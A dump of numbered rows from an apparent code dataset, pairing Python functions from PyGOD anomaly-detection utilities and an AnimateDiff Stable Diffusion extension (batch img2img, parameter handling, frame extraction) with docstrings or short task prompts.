lines = ''.join(params_list)
# Strip trailing space to avoid nightmare in doctests
lines = '\n'.join(l.rstrip(' ') for l in lines.split('\n'))
return lines | Pretty print the dictionary 'params' Parameters ---------- params : dict The dictionary to pretty print offset : int, optional The offset at the beginning of each line. printer : callable, optional The function to convert entries to strings, typically the builtin str or repr. |
3,814 | import os
import torch
import shutil
import numbers
import requests
import warnings
import numpy as np
from importlib import import_module
from ..metric import *
The provided code snippet includes necessary dependencies for implementing the `is_fitted` function. Write a Python function `def is_fitted(detector, attributes=None)` to solve the following problem:
Check if the detector is fitted. Parameters ---------- detector : pygod.detector.Detector The detector to check. attributes : list, optional The attributes to check. Default: ``None``. Returns ------- is_fitted : bool Whether the detector is fitted.
Here is the function:
def is_fitted(detector, attributes=None):
"""
Check if the detector is fitted.
Parameters
----------
detector : pygod.detector.Detector
The detector to check.
attributes : list, optional
The attributes to check.
Default: ``None``.
Returns
-------
is_fitted : bool
Whether the detector is fitted.
"""
if attributes is None:
attributes = ['model']
assert all(hasattr(detector, attr) and
eval('detector.%s' % attr) is not None
for attr in attributes), \
"The detector is not fitted yet" | Check if the detector is fitted. Parameters ---------- detector : pygod.detector.Detector The detector to check. attributes : list, optional The attributes to check. Default: ``None``. Returns ------- is_fitted : bool Whether the detector is fitted. |
3,815 | from random import choice
from pygod.detector import *
from pyod.models.lof import LOF
from torch_geometric.nn import MLP
from sklearn.ensemble import IsolationForest
def init_model(args):
dropout = [0, 0.1, 0.3]
lr = [0.1, 0.05, 0.01]
weight_decay = 0.01
if args.dataset == 'inj_flickr' or args.dataset == 'dgraph':
# sampling and minibatch training on large dataset flickr
batch_size = 64
num_neigh = 3
epoch = 2
else:
batch_size = 0
num_neigh = -1
epoch = 300
model_name = args.model
gpu = args.gpu
if hasattr(args, 'epoch'):
epoch = args.epoch
if args.dataset == 'reddit':
# for the low feature dimension dataset
hid_dim = [32, 48, 64]
elif args.dataset in ['enron', 'disney', 'dgraph', 'books']:
hid_dim = [8, 12, 16]
else:
hid_dim = [32, 64, 128, 256]
alpha = [0.8, 0.5, 0.2]
if model_name == "adone":
return AdONE(hid_dim=choice(hid_dim),
weight_decay=weight_decay,
dropout=choice(dropout),
lr=choice(lr),
epoch=epoch,
gpu=gpu,
batch_size=batch_size,
num_neigh=num_neigh)
elif model_name == 'anomalydae':
hd = choice(hid_dim)
return AnomalyDAE(embed_dim=hd,
out_dim=hd,
weight_decay=weight_decay,
dropout=choice(dropout),
theta=choice([10., 40., 90.]),
eta=choice([3., 5., 8.]),
lr=choice(lr),
epoch=epoch,
gpu=gpu,
alpha=choice(alpha),
batch_size=batch_size,
num_neigh=num_neigh)
elif model_name == 'conad':
return CONAD(hid_dim=choice(hid_dim),
weight_decay=weight_decay,
dropout=choice(dropout),
lr=choice(lr),
epoch=epoch,
gpu=gpu,
weight=choice(alpha),
batch_size=batch_size,
num_neigh=num_neigh)
elif model_name == 'dominant':
return DOMINANT(hid_dim=choice(hid_dim),
weight_decay=weight_decay,
dropout=choice(dropout),
lr=choice(lr),
epoch=epoch,
gpu=gpu,
weight=choice(alpha),
batch_size=batch_size,
num_neigh=num_neigh)
elif model_name == 'done':
return DONE(hid_dim=choice(hid_dim),
weight_decay=weight_decay,
dropout=choice(dropout),
lr=choice(lr),
epoch=epoch,
gpu=gpu,
batch_size=batch_size,
num_neigh=num_neigh)
elif model_name == 'gaan':
return GAAN(noise_dim=choice([8, 16, 32]),
hid_dim=choice(hid_dim),
weight_decay=weight_decay,
dropout=choice(dropout),
lr=choice(lr),
epoch=epoch,
gpu=gpu,
weight=choice(alpha),
batch_size=batch_size,
num_neigh=num_neigh)
elif model_name == 'gcnae':
return GAE(hid_dim=choice(hid_dim),
weight_decay=weight_decay,
dropout=choice(dropout),
lr=choice(lr),
epoch=epoch,
gpu=gpu,
batch_size=batch_size,
num_neigh=num_neigh)
elif model_name == 'guide':
return GUIDE(a_hid=choice(hid_dim),
s_hid=choice([4, 5, 6]),
weight_decay=weight_decay,
dropout=choice(dropout),
lr=choice(lr),
epoch=epoch,
gpu=gpu,
alpha=choice(alpha),
batch_size=batch_size,
num_neigh=num_neigh,
cache_dir='./tmp')
elif model_name == "mlpae":
return GAE(hid_dim=choice(hid_dim),
weight_decay=weight_decay,
dropout=choice(dropout),
lr=choice(lr),
epoch=epoch,
gpu=gpu,
batch_size=batch_size,
backbone=MLP)
elif model_name == 'lof':
return LOF()
elif model_name == 'if':
return IsolationForest()
elif model_name == 'radar':
return Radar(lr=choice(lr), gpu=gpu)
elif model_name == 'anomalous':
return ANOMALOUS(lr=choice(lr), gpu=gpu)
elif model_name == 'scan':
return SCAN(eps=choice([0.3, 0.5, 0.8]), mu=choice([2, 5, 10])) | null |
3,816 | from enum import Enum
from typing import Optional
import math
import torch
from torch import nn
from einops import rearrange
import torch.nn as disable_weight_init
from ldm.modules.attention import FeedForward
def zero_module(module):
# Zero out the parameters of a module and return it.
for p in module.parameters():
p.detach().zero_()
return module | null |
3,817 | from pathlib import Path
from types import MethodType
import os
import cv2
import numpy as np
import torch
import hashlib
from PIL import Image, ImageOps, UnidentifiedImageError
from modules import processing, shared, scripts, devices, masking, sd_samplers, images
from modules.processing import (StableDiffusionProcessingImg2Img,
process_images,
create_binary_mask,
create_random_tensors,
images_tensor_to_samples,
setup_color_correction,
opt_f)
from modules.shared import opts
from modules.sd_samplers_common import images_tensor_to_samples, approximation_indexes
from modules.sd_models import get_closet_checkpoint_match
from scripts.animatediff_logger import logger_animatediff as logger
from scripts.animatediff_utils import get_animatediff_arg, get_controlnet_units
def animatediff_i2i_init(self, all_prompts, all_seeds, all_subseeds): # only hack this when i2i-batch with batch mask
self.extra_generation_params["Denoising strength"] = self.denoising_strength
self.image_cfg_scale: float = self.image_cfg_scale if shared.sd_model.cond_stage_key == "edit" else None
self.sampler = sd_samplers.create_sampler(self.sampler_name, self.sd_model)
crop_regions = []
paste_to = []
masks_for_overlay = []
image_masks = self.image_mask
for idx, image_mask in enumerate(image_masks):
# image_mask is passed in as RGBA by Gradio to support alpha masks,
# but we still want to support binary masks.
image_mask = create_binary_mask(image_mask)
if self.inpainting_mask_invert:
image_mask = ImageOps.invert(image_mask)
if self.mask_blur_x > 0:
np_mask = np.array(image_mask)
kernel_size = 2 * int(2.5 * self.mask_blur_x + 0.5) + 1
np_mask = cv2.GaussianBlur(np_mask, (kernel_size, 1), self.mask_blur_x)
image_mask = Image.fromarray(np_mask)
if self.mask_blur_y > 0:
np_mask = np.array(image_mask)
kernel_size = 2 * int(2.5 * self.mask_blur_y + 0.5) + 1
np_mask = cv2.GaussianBlur(np_mask, (1, kernel_size), self.mask_blur_y)
image_mask = Image.fromarray(np_mask)
if self.inpaint_full_res:
masks_for_overlay.append(image_mask)
mask = image_mask.convert('L')
crop_region = masking.get_crop_region(np.array(mask), self.inpaint_full_res_padding)
crop_region = masking.expand_crop_region(crop_region, self.width, self.height, mask.width, mask.height)
crop_regions.append(crop_region)
x1, y1, x2, y2 = crop_region
mask = mask.crop(crop_region)
image_mask = images.resize_image(2, mask, self.width, self.height)
paste_to.append((x1, y1, x2-x1, y2-y1))
else:
image_mask = images.resize_image(self.resize_mode, image_mask, self.width, self.height)
np_mask = np.array(image_mask)
np_mask = np.clip((np_mask.astype(np.float32)) * 2, 0, 255).astype(np.uint8)
masks_for_overlay.append(Image.fromarray(np_mask))
image_masks[idx] = image_mask
self.mask_for_overlay = masks_for_overlay[0] # only for saving purpose
if paste_to:
self.paste_to = paste_to[0]
self._animatediff_paste_to_full = paste_to
self.overlay_images = []
add_color_corrections = opts.img2img_color_correction and self.color_corrections is None
if add_color_corrections:
self.color_corrections = []
imgs = []
for idx, img in enumerate(self.init_images):
latent_mask = (self.latent_mask[idx] if isinstance(self.latent_mask, list) else self.latent_mask) if self.latent_mask is not None else image_masks[idx]
# Save init image
if opts.save_init_img:
self.init_img_hash = hashlib.md5(img.tobytes()).hexdigest()
images.save_image(img, path=opts.outdir_init_images, basename=None, forced_filename=self.init_img_hash, save_to_dirs=False)
image = images.flatten(img, opts.img2img_background_color)
if not crop_regions and self.resize_mode != 3:
image = images.resize_image(self.resize_mode, image, self.width, self.height)
if image_masks:
image_masked = Image.new('RGBa', (image.width, image.height))
image_masked.paste(image.convert("RGBA").convert("RGBa"), mask=ImageOps.invert(masks_for_overlay[idx].convert('L')))
self.overlay_images.append(image_masked.convert('RGBA'))
# crop_region is not None if we are doing inpaint full res
if crop_regions:
image = image.crop(crop_regions[idx])
image = images.resize_image(2, image, self.width, self.height)
if image_masks:
if self.inpainting_fill != 1:
image = masking.fill(image, latent_mask)
if add_color_corrections:
self.color_corrections.append(setup_color_correction(image))
image = np.array(image).astype(np.float32) / 255.0
image = np.moveaxis(image, 2, 0)
imgs.append(image)
if len(imgs) == 1:
batch_images = np.expand_dims(imgs[0], axis=0).repeat(self.batch_size, axis=0)
if self.overlay_images is not None:
self.overlay_images = self.overlay_images * self.batch_size
if self.color_corrections is not None and len(self.color_corrections) == 1:
self.color_corrections = self.color_corrections * self.batch_size
elif len(imgs) <= self.batch_size:
self.batch_size = len(imgs)
batch_images = np.array(imgs)
else:
raise RuntimeError(f"bad number of images passed: {len(imgs)}; expecting {self.batch_size} or less")
image = torch.from_numpy(batch_images)
image = image.to(shared.device, dtype=devices.dtype_vae)
if opts.sd_vae_encode_method != 'Full':
self.extra_generation_params['VAE Encoder'] = opts.sd_vae_encode_method
self.init_latent = images_tensor_to_samples(image, approximation_indexes.get(opts.sd_vae_encode_method), self.sd_model)
devices.torch_gc()
if self.resize_mode == 3:
self.init_latent = torch.nn.functional.interpolate(self.init_latent, size=(self.height // opt_f, self.width // opt_f), mode="bilinear")
if image_masks is not None:
def process_letmask(init_mask):
# init_mask = latent_mask
latmask = init_mask.convert('RGB').resize((self.init_latent.shape[3], self.init_latent.shape[2]))
latmask = np.moveaxis(np.array(latmask, dtype=np.float32), 2, 0) / 255
latmask = latmask[0]
latmask = np.around(latmask)
return np.tile(latmask[None], (4, 1, 1))
if self.latent_mask is not None and not isinstance(self.latent_mask, list):
latmask = process_letmask(self.latent_mask)
else:
if isinstance(self.latent_mask, list):
latmask = [process_letmask(x) for x in self.latent_mask]
else:
latmask = [process_letmask(x) for x in image_masks]
latmask = np.stack(latmask, axis=0)
self.mask = torch.asarray(1.0 - latmask).to(shared.device).type(self.sd_model.dtype)
self.nmask = torch.asarray(latmask).to(shared.device).type(self.sd_model.dtype)
# this needs to be fixed to be done in sample() using actual seeds for batches
if self.inpainting_fill == 2:
self.init_latent = self.init_latent * self.mask + create_random_tensors(self.init_latent.shape[1:], all_seeds[0:self.init_latent.shape[0]]) * self.nmask
elif self.inpainting_fill == 3:
self.init_latent = self.init_latent * self.mask
self.image_conditioning = self.img2img_image_conditioning(image * 2 - 1, self.init_latent, image_masks) # let's ignore this image_masks which is related to inpaint model with different arch
def get_animatediff_arg(p: StableDiffusionProcessing):
"""
Get AnimateDiff argument from `p`. If it's a dict, convert it to AnimateDiffProcess.
"""
if not p.scripts:
return None
for script in p.scripts.alwayson_scripts:
if script.title().lower() == "animatediff":
animatediff_arg = p.script_args[script.args_from]
if isinstance(animatediff_arg, dict):
from scripts.animatediff_ui import AnimateDiffProcess
animatediff_arg = AnimateDiffProcess(**animatediff_arg)
p.script_args[script.args_from] = animatediff_arg
return animatediff_arg
return None
def get_controlnet_units(p: StableDiffusionProcessing):
"""
Get controlnet arguments from `p`.
"""
if not p.scripts:
return []
for script in p.scripts.alwayson_scripts:
if script.title().lower() == "controlnet":
cn_units = p.script_args[script.args_from:script.args_to]
return [x for x in cn_units if x.enabled]
return []
def animatediff_i2i_batch(
p: StableDiffusionProcessingImg2Img, input_dir: str, output_dir: str, inpaint_mask_dir: str,
args, to_scale=False, scale_by=1.0, use_png_info=False, png_info_props=None, png_info_dir=None):
ad_params = get_animatediff_arg(p)
assert ad_params.enable, "AnimateDiff is not enabled."
if not ad_params.video_path and not ad_params.video_source:
ad_params.video_path = input_dir
output_dir = output_dir.strip()
processing.fix_seed(p)
images = list(shared.walk_files(input_dir, allowed_extensions=(".png", ".jpg", ".jpeg", ".webp", ".tif", ".tiff")))
is_inpaint_batch = False
if inpaint_mask_dir:
inpaint_masks = shared.listfiles(inpaint_mask_dir)
is_inpaint_batch = bool(inpaint_masks)
if is_inpaint_batch:
assert len(inpaint_masks) == 1 or len(inpaint_masks) == len(images), 'The number of masks must be 1 or equal to the number of images.'
logger.info(f"[i2i batch] Inpaint batch is enabled. {len(inpaint_masks)} masks found.")
if len(inpaint_masks) > 1: # batch mask
p.init = MethodType(animatediff_i2i_init, p)
cn_units = get_controlnet_units(p)
for idx, cn_unit in enumerate(cn_units):
# batch path broadcast
if (cn_unit.input_mode.name == 'SIMPLE' and cn_unit.image is None) or \
(cn_unit.input_mode.name == 'BATCH' and not cn_unit.batch_images) or \
(cn_unit.input_mode.name == 'MERGE' and not cn_unit.batch_input_gallery):
cn_unit.input_mode = cn_unit.input_mode.__class__.BATCH
if "inpaint" in cn_unit.module:
cn_unit.batch_images = f"{cn_unit.batch_images}\nmask:{inpaint_mask_dir}"
logger.info(f"ControlNetUnit-{idx} is an inpaint unit without cond_hint specification. We have set batch_images = {cn_unit.batch_images}.")
logger.info(f"[i2i batch] Will process {len(images)} images, creating {p.n_iter} new videos.")
# extract "default" params to use in case getting png info fails
prompt = p.prompt
negative_prompt = p.negative_prompt
seed = p.seed
cfg_scale = p.cfg_scale
sampler_name = p.sampler_name
steps = p.steps
override_settings = p.override_settings
sd_model_checkpoint_override = get_closet_checkpoint_match(override_settings.get("sd_model_checkpoint", None))
batch_results = None
discard_further_results = False
frame_images = []
frame_masks = []
for i, image in enumerate(images):
try:
img = Image.open(image)
except UnidentifiedImageError as e:
print(e)
continue
# Use the EXIF orientation of photos taken by smartphones.
img = ImageOps.exif_transpose(img)
if to_scale:
p.width = int(img.width * scale_by)
p.height = int(img.height * scale_by)
frame_images.append(img)
image_path = Path(image)
if is_inpaint_batch:
if len(inpaint_masks) == 1:
mask_image_path = inpaint_masks[0]
p.image_mask = Image.open(mask_image_path)
else:
# try to find corresponding mask for an image using index matching
mask_image_path = inpaint_masks[i]
frame_masks.append(Image.open(mask_image_path))
mask_image = Image.open(mask_image_path)
p.image_mask = mask_image
if use_png_info:
try:
info_img = frame_images[0]
if png_info_dir:
info_img_path = os.path.join(png_info_dir, os.path.basename(image))
info_img = Image.open(info_img_path)
from modules import images as imgutil
from modules.infotext_utils import parse_generation_parameters
geninfo, _ = imgutil.read_info_from_image(info_img)
parsed_parameters = parse_generation_parameters(geninfo)
parsed_parameters = {k: v for k, v in parsed_parameters.items() if k in (png_info_props or {})}
except Exception:
parsed_parameters = {}
p.prompt = prompt + (" " + parsed_parameters["Prompt"] if "Prompt" in parsed_parameters else "")
p.negative_prompt = negative_prompt + (" " + parsed_parameters["Negative prompt"] if "Negative prompt" in parsed_parameters else "")
p.seed = int(parsed_parameters.get("Seed", seed))
p.cfg_scale = float(parsed_parameters.get("CFG scale", cfg_scale))
p.sampler_name = parsed_parameters.get("Sampler", sampler_name)
p.steps = int(parsed_parameters.get("Steps", steps))
model_info = get_closet_checkpoint_match(parsed_parameters.get("Model hash", None))
if model_info is not None:
p.override_settings['sd_model_checkpoint'] = model_info.name
elif sd_model_checkpoint_override:
p.override_settings['sd_model_checkpoint'] = sd_model_checkpoint_override
else:
p.override_settings.pop("sd_model_checkpoint", None)
if output_dir:
p.outpath_samples = output_dir
p.override_settings['save_to_dirs'] = False
p.override_settings['save_images_replace_action'] = "Add number suffix"
if p.n_iter > 1 or p.batch_size > 1:
p.override_settings['samples_filename_pattern'] = f'{image_path.stem}-[generation_number]'
else:
p.override_settings['samples_filename_pattern'] = f'{image_path.stem}'
p.init_images = frame_images
if len(frame_masks) > 0:
p.image_mask = frame_masks
proc = scripts.scripts_img2img.run(p, *args) # we should not support this, but just leave it here
if proc is None:
p.override_settings.pop('save_images_replace_action', None)
proc = process_images(p)
else:
logger.warn("Warning: you are using an unsupported external script. AnimateDiff may not work properly.")
if not discard_further_results and proc:
if batch_results:
batch_results.images.extend(proc.images)
batch_results.infotexts.extend(proc.infotexts)
else:
batch_results = proc
if 0 <= shared.opts.img2img_batch_show_results_limit < len(batch_results.images):
discard_further_results = True
batch_results.images = batch_results.images[:int(shared.opts.img2img_batch_show_results_limit)]
batch_results.infotexts = batch_results.infotexts[:int(shared.opts.img2img_batch_show_results_limit)]
return batch_results | null |
3,818 | import os
from modules.paths import data_path
from modules.processing import StableDiffusionProcessing, StableDiffusionProcessingImg2Img
from scripts.animatediff_ui import AnimateDiffProcess
from scripts.animatediff_logger import logger_animatediff as logger
class AnimateDiffProcess:
def __init__(
self,
model="mm_sd15_v3.safetensors",
enable=False,
video_length=0,
fps=8,
loop_number=0,
closed_loop='R-P',
batch_size=16,
stride=1,
overlap=-1,
format=shared.opts.data.get("animatediff_default_save_formats", ["GIF", "PNG"]),
interp='Off',
interp_x=10,
video_source=None,
video_path='',
mask_path='',
freeinit_enable=False,
freeinit_filter="butterworth",
freeinit_ds=0.25,
freeinit_dt=0.25,
freeinit_iters=3,
latent_power=1,
latent_scale=32,
last_frame=None,
latent_power_last=1,
latent_scale_last=32,
request_id = '',
):
self.model = model
self.enable = enable
self.video_length = video_length
self.fps = fps
self.loop_number = loop_number
self.closed_loop = closed_loop
self.batch_size = batch_size
self.stride = stride
self.overlap = overlap
self.format = format
self.interp = interp
self.interp_x = interp_x
self.video_source = video_source
self.video_path = video_path
self.mask_path = mask_path
self.freeinit_enable = freeinit_enable
self.freeinit_filter = freeinit_filter
self.freeinit_ds = freeinit_ds
self.freeinit_dt = freeinit_dt
self.freeinit_iters = freeinit_iters
self.latent_power = latent_power
self.latent_scale = latent_scale
self.last_frame = last_frame
self.latent_power_last = latent_power_last
self.latent_scale_last = latent_scale_last
# non-ui states
self.request_id = request_id
self.video_default = False
self.is_i2i_batch = False
self.prompt_scheduler = None
def get_list(self, is_img2img: bool):
return list(vars(self).values())[:(25 if is_img2img else 20)]
def get_dict(self, is_img2img: bool):
infotext = {
"model": self.model,
"video_length": self.video_length,
"fps": self.fps,
"loop_number": self.loop_number,
"closed_loop": self.closed_loop,
"batch_size": self.batch_size,
"stride": self.stride,
"overlap": self.overlap,
"interp": self.interp,
"interp_x": self.interp_x,
"freeinit_enable": self.freeinit_enable,
}
if self.request_id:
infotext['request_id'] = self.request_id
if motion_module.mm is not None and motion_module.mm.mm_hash is not None:
infotext['mm_hash'] = motion_module.mm.mm_hash[:8]
if is_img2img:
infotext.update({
"latent_power": self.latent_power,
"latent_scale": self.latent_scale,
"latent_power_last": self.latent_power_last,
"latent_scale_last": self.latent_scale_last,
})
try:
ad_git_tag = subprocess.check_output(
[git, "-C", motion_module.get_model_dir(), "describe", "--tags"],
shell=False, encoding='utf8').strip()
infotext['version'] = ad_git_tag
except Exception as e:
logger.warning(f"Failed to get git tag for AnimateDiff: {e}")
infotext_str = ', '.join(f"{k}: {v}" for k, v in infotext.items())
return infotext_str
def get_param_names(self, is_img2img: bool):
preserve = ["model", "enable", "video_length", "fps", "loop_number", "closed_loop", "batch_size", "stride", "overlap", "format", "interp", "interp_x"]
if is_img2img:
preserve.extend(["latent_power", "latent_power_last", "latent_scale", "latent_scale_last"])
return preserve
def _check(self):
assert (
self.video_length >= 0 and self.fps > 0
), "Video length and FPS should be positive."
assert not set(supported_save_formats[:-1]).isdisjoint(
self.format
), "At least one saving format should be selected."
def apply_xyz(self):
for k, v in xyz_attrs.items():
setattr(self, k, v)
def set_p(self, p: StableDiffusionProcessing):
self._check()
if self.video_length < self.batch_size:
p.batch_size = self.batch_size
else:
p.batch_size = self.video_length
if self.video_length == 0:
self.video_length = p.batch_size
self.video_default = True
if self.overlap == -1:
self.overlap = self.batch_size // 4
if "PNG" not in self.format or shared.opts.data.get("animatediff_save_to_custom", True):
p.do_not_save_samples = True
cn_units = get_controlnet_units(p)
min_batch_in_cn = -1
for cn_unit in cn_units:
# batch path broadcast
if (cn_unit.input_mode.name == 'SIMPLE' and cn_unit.image is None) or \
(cn_unit.input_mode.name == 'BATCH' and not cn_unit.batch_images) or \
(cn_unit.input_mode.name == 'MERGE' and not cn_unit.batch_input_gallery):
if not self.video_path:
extract_frames_from_video(self)
cn_unit.input_mode = cn_unit.input_mode.__class__.BATCH
cn_unit.batch_images = self.video_path
# mask path broadcast
if cn_unit.input_mode.name == 'BATCH' and self.mask_path and not cn_unit.batch_mask_dir:
cn_unit.batch_mask_dir = self.mask_path
# find minimun control images in CN batch
cn_unit_batch_params = cn_unit.batch_images.split('\n')
if cn_unit.input_mode.name == 'BATCH':
cn_unit.animatediff_batch = True # for A1111 sd-webui-controlnet
if not any([cn_param.startswith("keyframe:") for cn_param in cn_unit_batch_params[1:]]):
cn_unit_batch_num = len(shared.listfiles(cn_unit_batch_params[0]))
if min_batch_in_cn == -1 or cn_unit_batch_num < min_batch_in_cn:
min_batch_in_cn = cn_unit_batch_num
if min_batch_in_cn != -1:
self.fix_video_length(p, min_batch_in_cn)
def cn_batch_modifler(batch_image_files: List[str], p: StableDiffusionProcessing):
return batch_image_files[:self.video_length]
for cn_unit in cn_units:
if cn_unit.input_mode.name == 'BATCH':
cur_batch_modifier = getattr(cn_unit, "batch_modifiers", [])
cur_batch_modifier.append(cn_batch_modifler)
cn_unit.batch_modifiers = cur_batch_modifier
self.post_setup_cn_for_i2i_batch(p)
logger.info(f"AnimateDiff + ControlNet will generate {self.video_length} frames.")
def fix_video_length(self, p: StableDiffusionProcessing, min_batch_in_cn: int):
# ensure that params.video_length <= video_length and params.batch_size <= video_length
if self.video_length > min_batch_in_cn:
self.video_length = min_batch_in_cn
p.batch_size = min_batch_in_cn
if self.batch_size > min_batch_in_cn:
self.batch_size = min_batch_in_cn
if self.video_default:
self.video_length = min_batch_in_cn
p.batch_size = min_batch_in_cn
def post_setup_cn_for_i2i_batch(self, p: StableDiffusionProcessing):
if not (self.is_i2i_batch and isinstance(p, StableDiffusionProcessingImg2Img)):
return
if len(p.init_images) > self.video_length:
p.init_images = p.init_images[:self.video_length]
if p.image_mask and isinstance(p.image_mask, list) and len(p.image_mask) > self.video_length:
p.image_mask = p.image_mask[:self.video_length]
if len(p.init_images) < self.video_length:
self.video_length = len(p.init_images)
p.batch_size = len(p.init_images)
if len(p.init_images) < self.batch_size:
self.batch_size = len(p.init_images)
def update_infotext(p: StableDiffusionProcessing, params: AnimateDiffProcess):
if p.extra_generation_params is not None:
p.extra_generation_params["AnimateDiff"] = params.get_dict(isinstance(p, StableDiffusionProcessingImg2Img)) | null |
3,819 | import os
from modules.paths import data_path
from modules.processing import StableDiffusionProcessing, StableDiffusionProcessingImg2Img
from scripts.animatediff_ui import AnimateDiffProcess
from scripts.animatediff_logger import logger_animatediff as logger
def write_params_txt(info: str):
with open(os.path.join(data_path, "params.txt"), "w", encoding="utf8") as file:
file.write(info) | null |
3,820 | import os
from modules.paths import data_path
from modules.processing import StableDiffusionProcessing, StableDiffusionProcessingImg2Img
from scripts.animatediff_ui import AnimateDiffProcess
from scripts.animatediff_logger import logger_animatediff as logger
def infotext_pasted(infotext, results):
for k, v in results.items():
if not k.startswith("AnimateDiff"):
continue
assert isinstance(v, str), f"Expected string but got {v}."
try:
for items in v.split(', '):
field, value = items.split(': ')
results[f"AnimateDiff {field}"] = value
results.pop("AnimateDiff")
except Exception as e:
logger.warn(f"Failed to parse infotext value:\n{v}")
logger.warn(f"Exception: {e}")
break | null |
3,821 | import sys
from types import ModuleType
from typing import Optional
from modules import scripts
from scripts.animatediff_logger import logger_animatediff as logger
def apply_state(k, key_map=None):
def callback(_p, v, _vs):
if key_map is not None:
v = key_map[v]
xyz_attrs[k] = v
return callback
def str_to_bool(string):
string = str(string)
if string in ["None", ""]:
return None
elif string.lower() in ["true", "1"]:
return True
elif string.lower() in ["false", "0"]:
return False
else:
raise ValueError(f"Could not convert string to boolean: {string}")
def int_or_float(string):
try:
return int(string)
except ValueError:
return float(string)
def choices_bool():
return ["False", "True"]
def find_xyz_module() -> Optional[ModuleType]:
for data in scripts.scripts_data:
if data.script_class.__module__ in {"xyz_grid.py", "xy_grid.py"} and hasattr(data, "module"):
return data.module
return None
def patch_xyz():
xyz_module = find_xyz_module()
if xyz_module is None:
logger.warning("XYZ module not found.")
return
MODULE = "[AnimateDiff]"
xyz_module.axis_options.extend([
xyz_module.AxisOption(
label=f"{MODULE} Enabled",
type=str_to_bool,
apply=apply_state("enable"),
choices=choices_bool),
xyz_module.AxisOption(
label=f"{MODULE} Motion Module",
type=str,
apply=apply_state("model")),
xyz_module.AxisOption(
label=f"{MODULE} Video length",
type=int_or_float,
apply=apply_state("video_length")),
xyz_module.AxisOption(
label=f"{MODULE} FPS",
type=int_or_float,
apply=apply_state("fps")),
xyz_module.AxisOption(
label=f"{MODULE} Use main seed",
type=str_to_bool,
apply=apply_state("use_main_seed"),
choices=choices_bool),
xyz_module.AxisOption(
label=f"{MODULE} Closed loop",
type=str,
apply=apply_state("closed_loop"),
choices=lambda: ["N", "R-P", "R+P", "A"]),
xyz_module.AxisOption(
label=f"{MODULE} Batch size",
type=int_or_float,
apply=apply_state("batch_size")),
xyz_module.AxisOption(
label=f"{MODULE} Stride",
type=int_or_float,
apply=apply_state("stride")),
xyz_module.AxisOption(
label=f"{MODULE} Overlap",
type=int_or_float,
apply=apply_state("overlap")),
xyz_module.AxisOption(
label=f"{MODULE} Interp",
type=str_to_bool,
apply=apply_state("interp"),
choices=choices_bool),
xyz_module.AxisOption(
label=f"{MODULE} Interp X",
type=int_or_float,
apply=apply_state("interp_x")),
xyz_module.AxisOption(
label=f"{MODULE} Video path",
type=str,
apply=apply_state("video_path")),
xyz_module.AxisOptionImg2Img(
label=f"{MODULE} Latent power",
type=int_or_float,
apply=apply_state("latent_power")),
xyz_module.AxisOptionImg2Img(
label=f"{MODULE} Latent scale",
type=int_or_float,
apply=apply_state("latent_scale")),
xyz_module.AxisOptionImg2Img(
label=f"{MODULE} Latent power last",
type=int_or_float,
apply=apply_state("latent_power_last")),
xyz_module.AxisOptionImg2Img(
label=f"{MODULE} Latent scale last",
type=int_or_float,
apply=apply_state("latent_scale_last")),
]) | null |
3,822 | import os
import cv2
import subprocess
from pathlib import Path
from modules import shared
from modules.paths import data_path
from modules.processing import StableDiffusionProcessing
from scripts.animatediff_logger import logger_animatediff as logger
def generate_random_hash(length=8):
import hashlib
import secrets
# Generate a random number or string
random_data = secrets.token_bytes(32) # 32 bytes of random data
# Create a SHA-256 hash of the random data
hash_object = hashlib.sha256(random_data)
hash_hex = hash_object.hexdigest()
# Get the first 10 characters
if length > len(hash_hex):
length = len(hash_hex)
return hash_hex[:length]
def ffmpeg_extract_frames(source_video: str, output_dir: str, extract_key: bool = False):
from modules.devices import device
command = ["ffmpeg"]
if "cuda" in str(device):
command.extend(["-hwaccel", "cuda"])
command.extend(["-i", source_video])
if extract_key:
command.extend(["-vf", "select='eq(pict_type,I)'", "-vsync", "vfr"])
else:
command.extend(["-filter:v", "mpdecimate=hi=64*200:lo=64*50:frac=0.33,setpts=N/FRAME_RATE/TB"])
tmp_frame_dir = Path(output_dir)
tmp_frame_dir.mkdir(parents=True, exist_ok=True)
command.extend(["-qscale:v", "1", "-qmin", "1", "-c:a", "copy", str(tmp_frame_dir / '%09d.jpg')])
logger.info(f"Attempting to extract frames via ffmpeg from {source_video} to {output_dir}")
subprocess.run(command, check=True)
def cv2_extract_frames(source_video: str, output_dir: str):
logger.info(f"Attempting to extract frames via OpenCV from {source_video} to {output_dir}")
cap = cv2.VideoCapture(source_video)
frame_count = 0
tmp_frame_dir = Path(output_dir)
tmp_frame_dir.mkdir(parents=True, exist_ok=True)
while cap.isOpened():
ret, frame = cap.read()
if not ret:
break
cv2.imwrite(f"{tmp_frame_dir}/{frame_count}.png", frame)
frame_count += 1
cap.release()
def extract_frames_from_video(params):
assert params.video_source, "You need to specify cond hint for ControlNet."
params.video_path = shared.opts.data.get(
"animatediff_frame_extract_path",
f"{data_path}/tmp/animatediff-frames")
if not params.video_path:
params.video_path = f"{data_path}/tmp/animatediff-frames"
params.video_path = os.path.join(params.video_path, f"{Path(params.video_source).stem}-{generate_random_hash()}")
try:
ffmpeg_extract_frames(params.video_source, params.video_path)
except Exception as e:
logger.error(f"[AnimateDiff] Error extracting frames via ffmpeg: {e}, fall back to OpenCV.")
cv2_extract_frames(params.video_source, params.video_path) | null |
3,823 | import torch
import torch.fft as fft
import math
import os
import re
import sys
from modules import sd_models, shared, sd_samplers, devices
from modules.paths import extensions_builtin_dir
from modules.processing import StableDiffusionProcessing, opt_C, opt_f, StableDiffusionProcessingTxt2Img, StableDiffusionProcessingImg2Img, decode_latent_batch
from types import MethodType
from scripts.animatediff_logger import logger_animatediff as logger
from scripts.animatediff_ui import AnimateDiffProcess
def ddim_add_noise(
original_samples: torch.FloatTensor,
noise: torch.FloatTensor,
timesteps: torch.IntTensor,
) -> torch.FloatTensor:
alphas_cumprod = shared.sd_model.alphas_cumprod
# Make sure alphas_cumprod and timestep have same device and dtype as original_samples
alphas_cumprod = alphas_cumprod.to(device=original_samples.device, dtype=original_samples.dtype)
timesteps = timesteps.to(original_samples.device)
sqrt_alpha_prod = alphas_cumprod[timesteps] ** 0.5
sqrt_alpha_prod = sqrt_alpha_prod.flatten()
while len(sqrt_alpha_prod.shape) < len(original_samples.shape):
sqrt_alpha_prod = sqrt_alpha_prod.unsqueeze(-1)
sqrt_one_minus_alpha_prod = (1 - alphas_cumprod[timesteps]) ** 0.5
sqrt_one_minus_alpha_prod = sqrt_one_minus_alpha_prod.flatten()
while len(sqrt_one_minus_alpha_prod.shape) < len(original_samples.shape):
